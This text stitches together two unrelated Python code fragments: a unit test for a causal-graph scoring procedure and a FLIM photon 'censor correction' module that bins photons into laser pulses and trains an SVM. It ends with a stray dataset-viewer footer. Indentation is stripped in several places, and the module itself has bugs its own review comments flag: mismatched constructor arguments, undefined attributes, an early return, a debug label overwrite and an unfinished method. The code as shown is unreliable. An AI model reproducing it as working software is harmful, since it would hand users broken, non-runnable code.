        dist_B = abs(estimated_model.B - model.B).max()
        dist_B_fixed = abs(estimated_model_fixed.B - model.B).max()
        diff_dists = dist_B - dist_B_fixed
        text = " dist. to population B unconstrained < fixed psi: %s - diff = %s" % (
            dist_B < dist_B_fixed, diff_dists)
        thresh = 0
        if diff_dists > thresh:
            print("*** (> %s)" % thresh, colored(text, 'red'))
        else:
            print(text)
        # self.assertLess(dist_B, dist_B_fixed)
        # Check that sparsity is respected
        mask = np.logical_not(model.A)
        self.assertTrue(np.allclose(estimated_model.B[mask], 0))
        self.assertTrue(np.allclose(estimated_model_fixed.B[mask], 0))
def test_with_interventions_population(self):
"""Generate the population covariances from a random graph and some
random intervention targets; check that the score remains
close when applying the alternating procedure to I-equivalent
DAGs, when setting I to I* and to the full set.
TEST PASSES IF:
- estimated B respects sparsity in A
- score is <5e-2 from score of true population parameters
"""
G = NUM_GRAPHS
p = 10
num_latent = 2
e = 5
var_lo, var_hi = 1, 2
B_lo, B_hi = 0.6, 0.8
size_I = (0, 3)
print("\n" + "-" * 70)
print("Testing alternating procedure with population covariances and different interventions")
for i in range(G):
# Sample intervention targets
true_I = set(
sempler.generators.intervention_targets(p, 1, size_I)[0])
# Build model
model = sample_model(p, true_I, num_latent, e, var_lo,
var_hi, B_lo, B_hi, random_state=i)
sample_covariances = model.covariances()
n_obs = np.array([1] * model.e)
pop_score = model.score(sample_covariances, n_obs)
# Get equivalent DAGs
icpdag = utils.dag_to_icpdag(model.A, true_I)
equivalent_dags = utils.all_dags(icpdag)
print("\nGraph %d - I* = %s - %d equivalent DAGs" %
(i, true_I, len(equivalent_dags)))
for k, dag in enumerate(equivalent_dags):
for I in [true_I, set(range(p))]:
print(" Eq. graph %d/%d; I = %s" %
(k + 1, len(equivalent_dags), I))
start = time.time()
score_class = Score((sample_covariances, n_obs),
num_latent=num_latent, psi_max=None, psi_fixed=False,
max_iter=1000, threshold_dist_B=1e-3,
threshold_fluctuation=1, max_fluctuations=10,
threshold_score=1e-6, learning_rate=10)
estimated_model, estimate_score = score_class.score_dag(
dag, I, verbose=0)
mask = np.logical_not(dag)
print(" Done in %0.2f seconds" % (time.time() - start))
| |
"""
__author__ = <NAME>
"""
import attr
import numpy as np
import pandas as pd
from attr.validators import instance_of
from pysight.nd_hist_generator.movie import Movie, FrameChunk
from collections import deque, namedtuple
from typing import Tuple, Union
from numba import jit, uint8, int64
@attr.s(slots=True)
class CensorCorrection(object):
    """Apply (optional) censor correction to FLIM photon data.

    Walks over the volumes of a :class:`Movie`, allocates photons to their
    originating laser pulses and builds per-pulse photon histograms used for
    downstream statistics / machine learning.
    """

    # Raw event streams keyed by channel name (e.g. "Laser", "PMT1").
    raw = attr.ib(validator=instance_of(dict))
    # Photon event table (validated to be a pandas DataFrame).
    data = attr.ib(validator=instance_of(pd.DataFrame))
    # Movie object that yields per-volume data via gen_of_volumes().
    movie = attr.ib(validator=instance_of(Movie))
    # Recorded laser pulse times; 0 means no 'Laser' channel was recorded.
    all_laser_pulses = attr.ib()
    # Populated by create_arr_of_hists_deque(); one entry per data channel.
    nano_flim_list = attr.ib(init=False)
    # Master switch: the correction only runs when FLIM is active.
    flim = attr.ib(default=False, validator=instance_of(bool))
    # Laser repetition rate [Hz].
    reprate = attr.ib(default=80e6, validator=instance_of(float))
    # Width of a single timing bin [s].
    binwidth = attr.ib(default=800e-12, validator=instance_of(float))
    # Laser-to-detection offset [ns]; converted to whole bins by `offset`.
    laser_offset = attr.ib(default=3.5, validator=instance_of(float))
    # Number of recorded data channels.
    num_of_channels = attr.ib(default=1, validator=instance_of(int))

    @property
    def bins_bet_pulses(self) -> int:
        # Number of binwidth-sized bins between two consecutive laser pulses.
        return int(np.ceil(1 / (self.reprate * self.binwidth)))

    @property
    def offset(self):
        # laser_offset is given in nanoseconds; convert to a whole bin count.
        return int(np.floor(self.laser_offset * 10 ** -9 / self.binwidth))

    def run(self):
        """
        Main pipeline for the censor correction part.

        Runs only when FLIM is active; otherwise just reports that the
        correction was skipped.
        """
        if self.flim:
            print("Starting the censor correction...")
            self.create_arr_of_hists_deque()
        else:
            print("FLIM deactivated, no censor correction performed.")

    def __gen_laser_pulses_deque(self) -> np.ndarray:
        """
        If data has laser pulses - return them. Else - simulate them with an offset.

        NOTE: despite the annotation, this is a generator yielding one
        np.ndarray of pulse times per volume.
        """
        start_time = 0
        step = self.bins_bet_pulses
        volumes_in_movie = self.movie.gen_of_volumes()
        if (
            self.all_laser_pulses == 0 and self.flim == False
        ):  # no 'Laser' data was recorded
            # Simulate evenly spaced pulses covering each volume.
            # NOTE(review): start_time is never advanced between volumes, so
            # every simulated train starts at `offset` — confirm intended.
            for vol in volumes_in_movie:
                yield np.arange(
                    start=start_time + self.offset,
                    stop=vol.end_time,
                    step=step,
                    dtype=np.uint64,
                )
        elif self.all_laser_pulses == 0 and self.flim == True:
            # FLIM active but no pulses recorded: nothing to yield.
            pass
        else:
            # Real pulses recorded: slice the ones belonging to each volume
            # (with one-interval margins) and shift by the detection offset.
            for vol in volumes_in_movie:
                yield self.all_laser_pulses[
                    (self.all_laser_pulses >= vol.abs_start_time - step)
                    & (self.all_laser_pulses <= vol.end_time + step)
                ] + self.offset

    def __get_bincount_deque(self):
        """Build, per volume, the per-pulse photon histograms and bincounts.

        :return: deque of dicts with keys 'photon_hist', 'bincount' and
                 'num_empty_hists' (one dict per volume).
        """
        print("Movie object created. Generating the bincount deque...")
        bincount_deque = deque()
        laser_pulses_deque = self.__gen_laser_pulses_deque()
        volumes_in_movie = self.movie.gen_of_volumes()
        for idx, vol in enumerate(volumes_in_movie):
            # NOTE(review): the keyword args (vol=, laser_pulses=) do not match
            # the attributes declared on CensoredVolume below (df, chunk,
            # offset, binwidth, reprate) — confirm against its definition.
            censored = CensoredVolume(
                df=vol.data,
                vol=vol,
                offset=self.offset,
                laser_pulses=next(laser_pulses_deque),
            )
            dig, bincount = censored.gen_bincount()
            # Keep only photons that fell inside a laser pulse interval.
            pos_idx = np.where(dig >= 0)[0]
            dig = dig[pos_idx]
            pos_photons = censored.df.iloc[pos_idx, -1].values.T
            if len(pos_photons) == 0:
                # No photons in this volume — emit a single placeholder entry.
                # NOTE(review): this returns the dict itself (not the deque)
                # and aborts the remaining volumes — looks like a bug; confirm.
                data_dict = {
                    "photon_hist": np.zeros((self.bins_bet_pulses, 1), dtype=np.uint8),
                    "bincount": bincount,
                    "num_empty_hists": bincount[0],
                }
                return data_dict
            # One uint8 histogram column per photon-carrying pulse.
            photon_hist = np.zeros(
                (self.bins_bet_pulses, pos_photons.shape[0]), dtype=np.uint8
            )
            for laser_idx, photon in enumerate(np.nditer(pos_photons)):
                start_time = censored.laser_pulses[dig[laser_idx]]
                try:
                    end_time = censored.laser_pulses[dig[laser_idx] + 1]
                except IndexError:  # photons out of laser pulses
                    continue
                else:
                    photon_hist[:, laser_idx] = np.histogram(
                        photon, bins=np.arange(start_time, end_time + 1, dtype="uint64")
                    )[0]
            data_dict = {
                "photon_hist": photon_hist,
                "bincount": bincount,
                "num_empty_hists": bincount[0],
            }
            assert (
                data_dict["num_empty_hists"] >= 0
            ), "Sum of bincount: {}, number of photons: {}".format(
                sum(bincount), laser_idx
            )
            bincount_deque.append(data_dict)
        return bincount_deque

    def find_temporal_structure_deque(self):
        """Per volume, compute the summed temporal structure of the photons.

        :return: deque with one histogram per volume.
        """
        temp_struct_deque = deque()
        laser_pulses_deque = self.__gen_laser_pulses_deque()
        volumes_in_movie = self.movie.gen_of_volumes()
        for idx, vol in enumerate(volumes_in_movie):
            censored = CensoredVolume(
                df=vol.data,
                vol=vol,
                offset=self.offset,
                laser_pulses=next(laser_pulses_deque),
                binwidth=self.binwidth,
                reprate=self.reprate,
            )
            temp_struct_deque.append(censored.find_temp_structure())
        return temp_struct_deque

    def __worker_arr_of_hists(self, vol):
        # Helper: build the per-pixel histogram array for a single volume.
        censored = CensoredVolume(
            df=vol.data,
            vol=vol,
            offset=self.offset,
            binwidth=self.binwidth,
            reprate=self.reprate,
        )
        return censored.gen_arr_of_hists()

    def create_arr_of_hists_deque(self):
        """
        For each volume generate a single matrix with the same size as the underlying volume,
        which contains a histogram of photons in their laser pulses for each pixel.
        :return: deque() that contains an array of histograms in each place
        """
        self.nano_flim_list = []  # each cell contains a different data channel
        for chan in range(1, self.num_of_channels + 1):
            print("Starting channel number {}: ".format(chan))
            volumes_in_movie = self.movie.gen_of_volumes(channel_num=chan)
            self.nano_flim_list.append(
                [self.__worker_arr_of_hists(vol) for vol in volumes_in_movie]
            )

    def create_array_of_hists_deque(self):
        """
        Go through each volume in the deque and find the laser pulses for each pixel, creating a summed histogram per pixel.
        :return: deque with one per-pixel histogram array per volume.
        """
        temp_struct_deque = deque()
        laser_pulses_deque = self.__gen_laser_pulses_deque()
        volumes_in_movie = self.movie.gen_of_volumes()
        for idx, vol in enumerate(volumes_in_movie):
            censored = CensoredVolume(
                df=vol.data,
                vol=vol,
                offset=self.offset,
                laser_pulses=next(laser_pulses_deque),
                binwidth=self.binwidth,
                reprate=self.reprate,
            )
            temp_struct_deque.append(censored.gen_array_of_hists())
        return temp_struct_deque

    def __gen_labels(self, size: int, label: Union[int, float]) -> np.ndarray:
        """
        Create labels for the ML algorithm. Label value must be an integer.
        :size: Number of elements
        :return: np.ndarray

        NOTE(review): the float branch is unimplemented and falls through,
        returning None — confirm before passing a float label.
        """
        if isinstance(label, int):  # fixed power during the session
            return np.ones(size, dtype=np.uint8) * label
        elif isinstance(
            label, float
        ):  # `label` contains the frequency of the triangular wave
            pass

    def learn_histograms(
        self, label: Union[int, float], power: int, folder_to_save: str
    ):
        """
        Implement the machine learning algorithm on the data.
        :param label: Label of ML algorithm.
        :param power: How much power was injected to the Qubig. For saving the file.
        :param folder_to_save: Directory in which the data matrix is saved.
        :return: data, labels
        """
        from sklearn import svm, metrics
        import pathlib

        # Start by generating the data and arranging it properly for the machine
        bincount = self.__get_bincount_deque()
        print("Bincount done. Adding all data to a single matrix.")
        data = np.empty((self.bins_bet_pulses, 0))
        for vol in bincount:
            data = np.concatenate(
                (data, vol["photon_hist"]), axis=1
            )  # the histograms with photons in them
            data = np.concatenate(
                (
                    data,
                    np.zeros(
                        (self.bins_bet_pulses, vol["num_empty_hists"]), dtype=np.uint8
                    ),
                ),
                axis=1,
            )  # empty hists
        data = data.T
        n_samples = data.shape[0]
        labels = self.__gen_labels(n_samples, label)
        classifier = svm.SVC(gamma=0.001)
        # NOTE(review): debug leftover — overwrites one label; confirm removal.
        labels[1] = 10  # toying around
        print("Fitting the data...")
        # Train on the first half of the samples, evaluate on the second half.
        classifier.fit(data[: n_samples // 2], labels[: n_samples // 2])
        # Predictions
        expected = labels[n_samples // 2 :]
        predicted = classifier.predict(data[n_samples // 2 :])
        print("Number of samples is %s." % n_samples)
        print(
            "Classification report for classifier %s:\n%s\n"
            % (classifier, metrics.classification_report(expected, predicted))
        )
        print("Confusion matrix:\n%s" % metrics.confusion_matrix(expected, predicted))
        # Save the data for future use
        folder_as_path = pathlib.Path(folder_to_save)
        filename = str(folder_as_path / "{}p_label_{}.npy".format(power, label))
        self.__save_data(data=data, filename=filename)
        return data, labels

    def __save_data(self, data: np.ndarray, filename: str):
        """
        Save the data array for future training.
        :param data: Data to be learnt.
        :param filename: Including dir
        :return:
        """
        print("Saving to {}...".format(filename))
        with open(filename, "wb") as f:
            np.save(f, data)

    def append_laser_line(self):
        """
        Add a final laser line to the laser signal input.

        The synthetic row sits one inter-pulse interval after the last
        recorded pulse so the binning below has a closing edge.
        """
        last_laser_row = pd.DataFrame(
            {
                "abs_time": self.raw["Laser"]["abs_time"].iat[-1]
                + self.bins_bet_pulses,
                "edge": 0,
                "sweep": self.raw["Laser"]["sweep"].iat[-1],
                "time_rel_sweep": self.raw["Laser"]["time_rel_sweep"].iat[-1]
                + self.bins_bet_pulses,
            },
            index=[self.raw["Laser"].shape[0]],
        )
        self.raw["Laser"] = pd.concat([self.raw["Laser"], last_laser_row])

    def train_dataset(self):
        """
        Using almost raw data, allocate photons to their laser pulses
        (instead of laser pulses to photons) and create all 16 bit words for the ML algorithm.
        :return:

        NOTE(review): this method appears unfinished — the loop below only
        extracts `cur_pulse`, and neither `sorted_indices` nor `hist_df` is
        used afterwards.
        """
        # Append a fake laser pulse to retain original number of "bins"
        self.append_laser_line()
        # Bin each photon into the interval between two laser pulses.
        sorted_indices = pd.cut(
            self.raw["PMT1"]["abs_time"],
            bins=self.raw["Laser"]["abs_time"],
            labels=self.raw["Laser"].iloc[:-1, 3],
            include_lowest=True,
        )
        self.raw["Laser"].set_index(
            keys="time_rel_sweep", inplace=True, append=True, drop=True
        )
        num_of_pos_bins = 22
        new_bins = np.arange(-10, num_of_pos_bins + 1)  # 32 bins
        min_time_after_sweep = 10
        # NOTE(review): "time_rel_sweep" was just moved into the index with
        # drop=True; this column access may raise KeyError — confirm.
        max_time_after_sweep = (
            self.raw["Laser"]["time_rel_sweep"].max() - num_of_pos_bins - 1
        )
        indices = np.arange(min_time_after_sweep, max_time_after_sweep)
        hist_df = pd.DataFrame([], dtype=object)
        for idx in indices:
            cur_pulse = self.raw["Laser"].xs(
                idx, level="time_rel_sweep", drop_level=False
            )
@attr.s(slots=True)
class CensoredVolume(object):
df = attr.ib(validator=instance_of(pd.DataFrame))
chunk = attr.ib(validator=instance_of(FrameChunk))
offset = attr.ib(validator=instance_of(int))
binwidth = attr.ib(default=800e-12)
reprate = attr.ib(default=80e6)
@property
def bins_bet_pulses(self) -> int:
    """Number of binwidth-sized time bins between consecutive laser pulses."""
    bins_per_period = 1 / (self.reprate * self.binwidth)
    return int(np.ceil(bins_per_period))
def gen_bincount(self) -> Tuple[np.ndarray, np.ndarray]:
    """
    Bin the photons into their relative laser pulses, and count how many photons arrived due to each pulse.

    Returns ``(pulse_index, counts)`` where ``pulse_index[i]`` is the index of
    the pulse preceding photon ``i`` and ``counts[k]`` is the number of pulses
    that produced exactly ``k`` photons.
    """
    arrival_times = self.chunk.data.loc[:, "time_rel_frames"].values
    # NOTE(review): `laser_pulses` is not a declared attr.ib on this class —
    # confirm it is attached elsewhere before this method runs.
    pulse_edges = self.laser_pulses
    photons_per_pulse, _ = np.histogram(arrival_times, bins=pulse_edges)
    pulse_index = np.digitize(arrival_times, bins=pulse_edges) - 1
    return pulse_index, np.bincount(photons_per_pulse)
def find_temp_structure(self) -> np.ndarray:
    """
    Generate a summed histogram of the temporal structure of detected photons.

    Photon times are taken relative to their preceding laser pulse and
    histogrammed over one full inter-pulse period.
    """
    period_in_bins = np.ceil(1 / (self.reprate * self.binwidth))
    bin_edges = np.arange(start=0, stop=period_in_bins + 1, step=1)
    relative_times = self.sort_photons_in_pulses()[0]
    counts, _ = np.histogram(relative_times, bins=bin_edges)
    return counts
def sort_photons_in_pulses(self):
    """
    Helper function to generate a searchsorted output of photons in laser pulses.

    Returns ``(subtracted_times, starts, indices)``: each photon's time
    relative to its preceding pulse, the pulse start times, and the pulse
    indices found by searchsorted.
    """
    # NOTE(review): neither `laser_pulses` nor `movie` is a declared attr.ib
    # on this slots class; `self.movie` in particular looks like it should be
    # `self.chunk` — confirm before relying on this method.
    pulse_times = self.laser_pulses
    photon_times = self.movie.data["time_rel_frames"].values
    preceding_idx: np.ndarray = np.searchsorted(pulse_times, photon_times) - 1
    pulse_starts = pulse_times[preceding_idx]
    relative_times = photon_times - pulse_starts
    return relative_times, pulse_starts, preceding_idx
def gen_array_of_hists(self) -> np.ndarray:
"""
For a specific frame, sort photons and laser pulses inside the pixels to gain
statistics on the distribution of the photons inside the pixels.
:return: np.ndarray of the same size as the original image. Each pixels contains
a histogram inside it.
"""
BinData = namedtuple("BinData", ("hist", "pulses", "photons"))
all_pulses = 0
all_photons = 0
hist, edges = self.chunk.create_hist()
# Create a relative timestamp to the line signal for each laser pulse
sorted_pulses = np.searchsorted(edges[0][:-1], self.laser_pulses) - 1
pulses = pd.DataFrame(
data=self.laser_pulses[np.where(sorted_pulses >= 0)[0]],
columns=["time_rel_frames"],
)
pulses = pulses.assign(
Lines=edges[0][:-1][sorted_pulses[np.where(sorted_pulses >= 0)[0]]]
)
pulses.dropna(how="any", inplace=True)
pulses.loc[:, "Lines"] = pulses.loc[:, "Lines"].astype("uint64")
pulses.loc[:, "time_rel_line"] = (
pulses.loc[:, "time_rel_frames"] - pulses.loc[:, "Lines"]
)
pulses.loc[:, "Lines"] = pulses.loc[:, "Lines"].astype("category")
pulses.set_index(keys=["Lines"], inplace=True, append=True, drop=True)
# Allocate laser pulses and photons to their bins
pulses.loc[:, "bins_x"] = (
np.digitize(pulses.loc[:, "time_rel_frames"].values, bins=edges[0]) - 1
).astype("uint16", copy=False)
pulses.loc[:, "bins_y"] = (
np.digitize(pulses.loc[:, "time_rel_line"].values, bins=edges[1]) - 1
).astype("uint16", copy=False)
self.chunk.data.loc[:, "bins_x"] = (
np.digitize(self.chunk.data.loc[:, "time_rel_frames"].values, bins=edges[0])
- 1
).astype("uint16", copy=False)
self.chunk.data.loc[:, "bins_y"] = (
np.digitize(self.chunk.data.loc[:, "time_rel_line"].values, bins=edges[1])
- 1
).astype("uint16", copy=False)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.